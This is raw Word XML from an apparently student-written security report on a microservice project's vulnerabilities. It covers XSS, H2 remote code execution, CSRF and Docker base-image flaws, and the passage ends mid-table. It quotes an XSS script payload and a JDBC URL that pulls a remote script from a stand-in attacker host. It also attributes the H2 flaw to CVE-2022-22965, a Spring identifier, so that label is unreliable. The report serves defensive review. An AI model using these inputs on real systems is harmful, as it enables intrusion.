          <w:p w14:paraId="385CA963" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="0027424F">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Sanitize all user inputs used in HTML output. Implement content security policies that restrict the loading of resources to trusted sources only. Utilize frameworks that automatically handle XSS protection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46D88167" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="00CA7D46"/>
    <w:p w14:paraId="57F37F86" w14:textId="1500894A" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="008A42C2">
      <w:r w:rsidRPr="00CA7D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Example: </w:t>
      </w:r>
      <w:r w:rsidR="007C3F4F">
        <w:t>The sending of messages is not checking the user input for malicious strings, which may lead to an attacker sending a message containing ‘</w:t>
      </w:r>
      <w:r w:rsidR="007C3F4F" w:rsidRPr="00CA7D46">
        <w:t>&lt;script&gt;alert('Hacked</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007C3F4F" w:rsidRPr="00CA7D46">
        <w:t>');&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007C3F4F" w:rsidRPr="00CA7D46">
        <w:t>/script</w:t>
      </w:r>
      <w:r w:rsidR="007C3F4F">
        <w:t xml:space="preserve">’, which can execute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C3F4F">
        <w:t>wjen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C3F4F">
        <w:t xml:space="preserve"> it is viewed by other users. In this particular case, however, the </w:t>
      </w:r>
      <w:r w:rsidR="008A42C2">
        <w:t>endpoint for sending a message is used only for the development phase and to test the connection between the services and message broker. This controller will be removed before the deployment phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB42E62" w14:textId="77777777" w:rsidR="008A42C2" w:rsidRDefault="008A42C2" w:rsidP="008A42C2"/>
    <w:p w14:paraId="4AE56058" w14:textId="078133CB" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc168573794"/>
      <w:r>
        <w:t xml:space="preserve">Project: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>movimingle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-voting-service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="5CADD9EC" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc168573795"/>
      <w:r>
        <w:t>1. H2 Database Engine Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="148E174B" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2022-22965 (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A204295" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>File: pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A719A8" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Affected Library: H2 Database Engine (com.h2database:h2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F901F77" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Introduced Through: com.h2database:h2@2.2.224</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67140579" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Fixed in Version: Not specified</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2158"/>
        <w:gridCol w:w="2156"/>
        <w:gridCol w:w="2157"/>
        <w:gridCol w:w="2159"/>
      </w:tblGrid>
      <w:tr w:rsidR="00572BDB" w14:paraId="4A49F870" w14:textId="77777777" w:rsidTr="001C5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22ECB8" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04E008B1" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21BA2A78" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OWASP Top 10 Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DFC11F6" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00572BDB" w14:paraId="5ADC8E2E" w14:textId="77777777" w:rsidTr="001C5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2CCB416" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>The vulnerability allows for remote code execution when performing JDBC operations with a maliciously crafted URL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="522569D6" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="005A1947" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>A01:2021 - Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B8866CD" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Consider switching to a different database engine or apply strict access controls and input validations. Monitor the H2 Database Engine repositories for updates or patches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60476E9B" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="00CA7D46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8A4C7E" w14:textId="6D1D3C16" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="00CA7D46">
      <w:r w:rsidRPr="00CA7D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7D46">
        <w:t xml:space="preserve"> An attacker alters the JDBC URL in the application’s configuration file to </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7D46">
        <w:t>jdbc:h</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA7D46">
        <w:t>2:tcp://evil-website.com/~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7D46">
        <w:t>test;TRACE_LEVEL_FILE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7D46">
        <w:t>=3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA7D46">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7D46">
        <w:t>, causing the database to execute a remote script whenever it starts up.</w:t>
      </w:r>
      <w:r w:rsidR="008A42C2">
        <w:t xml:space="preserve"> This, just as the message controller, is a part of the application which will exist only in the testing phase and will not be part once it enters the deployment phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD0C60" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc168573796"/>
      <w:r>
        <w:t>3. Cross-Site Request Forgery (CSRF) Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="35C09365" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>File: src/main/java/com/backend/votingservice/controller/PartyController.java</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2158"/>
        <w:gridCol w:w="2155"/>
        <w:gridCol w:w="2158"/>
        <w:gridCol w:w="2159"/>
      </w:tblGrid>
      <w:tr w:rsidR="00572BDB" w14:paraId="3FD52C11" w14:textId="77777777" w:rsidTr="001C5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7E35F56" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28CD3152" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62E9F0C7" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OWASP Top 10 Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43C6E1E7" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00572BDB" w14:paraId="46485D5A" w14:textId="77777777" w:rsidTr="001C5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0085726" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>The application does not implement CSRF protection for its forms, allowing attackers to submit unauthorized requests on behalf of a logged-in user.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B0437E1" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BE07BF2" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>A05:2021 - Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DFFB826" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Implement CSRF tokens in the application forms. Enable CSRF protection provided by Spring Security in the security configurations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61320D7A" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc168573797"/>
      <w:r>
        <w:t>Dockerfile Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="583BDB9C" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The following vulnerabilities were identified in the Docker image used for these projects. Due to time constraints, changes to the JDK or updating the dependencies will not be implemented immediately. These vulnerabilities are primarily due to the version of the JDK used and the nature of OpenJDK images, which often contain vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B64C4CB" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc168573798"/>
      <w:r>
        <w:t>dpkg - Directory Traversal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4CA4BE4B" w14:textId="74B62F04" w:rsidR="001C5827" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Base Image: openjdk:17-jdk-slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E630089" w14:textId="77777777" w:rsidR="008A42C2" w:rsidRDefault="008A42C2"/>
    <w:p w14:paraId="204DEDDA" w14:textId="77777777" w:rsidR="008A42C2" w:rsidRDefault="008A42C2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2158"/>
        <w:gridCol w:w="2156"/>
        <w:gridCol w:w="2157"/>
        <w:gridCol w:w="2159"/>
      </w:tblGrid>
      <w:tr w:rsidR="00572BDB" w14:paraId="659F4632" w14:textId="77777777" w:rsidTr="001C5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256C9D" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C4C663" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12FB877A" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OWASP Top 10 Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5689200C" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00572BDB" w14:paraId="13076639" w14:textId="77777777" w:rsidTr="001C5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A54E433" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>This vulnerability allows for directory traversal attacks, which can potentially lead to unauthorized file access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15C351EB" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="012A729A" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>A01:2021 - Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="547B2355" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Plan for updating the base image post-semester to a version without this vulnerability. Monitor for updates and patches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="634E98B5" w14:textId="77777777" w:rsidR="00B95AF5" w:rsidRPr="00B95AF5" w:rsidRDefault="00B95AF5" w:rsidP="00B95AF5"/>
    <w:p w14:paraId="1DE95EB1" w14:textId="0C3692CF" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc168573799"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/libssl1.1 - OS Command Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="1CE278CE" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Base Image: openjdk:17-jdk-slim</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2158"/>
        <w:gridCol w:w="2156"/>
        <w:gridCol w:w="2157"/>
        <w:gridCol w:w="2159"/>
      </w:tblGrid>
      <w:tr w:rsidR="00572BDB" w14:paraId="6EF20EFC" w14:textId="77777777" w:rsidTr="001C5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7413BC5" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C9ED29A" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54023636" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OWASP Top 10 Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73E68E68" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00572BDB" w14:paraId="5DD8E8B6" w14:textId="77777777" w:rsidTr="001C5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35C644" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>The vulnerability allows for OS command injection, which could enable an attacker to execute arbitrary commands.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45040E1F" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="479E98EC" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
